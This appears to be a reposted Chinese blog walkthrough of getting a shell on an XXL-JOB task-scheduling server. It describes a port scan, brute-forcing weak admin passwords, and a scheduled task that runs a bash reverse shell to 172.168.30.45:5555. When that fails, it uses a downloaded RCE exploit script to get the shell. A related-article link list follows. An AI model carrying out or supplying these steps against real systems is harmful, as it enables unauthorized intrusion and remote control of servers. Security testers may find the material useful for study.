XXL-JOB(任務調度中心)-反彈getshell

常規掃描

端口掃描掃出來9999 百度得出是xxl-job服務並爆出后台默認路徑

后台登錄沒有驗證碼嘗試爆破一下弱口令

添加定時任務

bash反彈命令

/bin/bash -i >& /dev/tcp/172.168.30.45/5555 0>&1

命令執行不成功 bash會話並沒有反彈

下載漏洞exp

python3 E:\xxl-job-rce-main\xxl-job-rce exe-code.py

成功反彈

參考

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 XXL-JOB(任務調度中心)-反彈getshell linux下部署XXL-JOB任務調度中心分布式任務調度系統xxl-job源碼探究（二、服務中心） xxl-job定時任務調度平台分布式任務調度系統 xxl-job 《分布式任務調度平台XXL-JOB》 xxl-job 分布式任務調度框架分布式任務調度解決方案XXL-JOB快速搭建教程分布式任務調度平台XXL-JOB簡單使用分布式任務調度平台xxl-job的使用（java）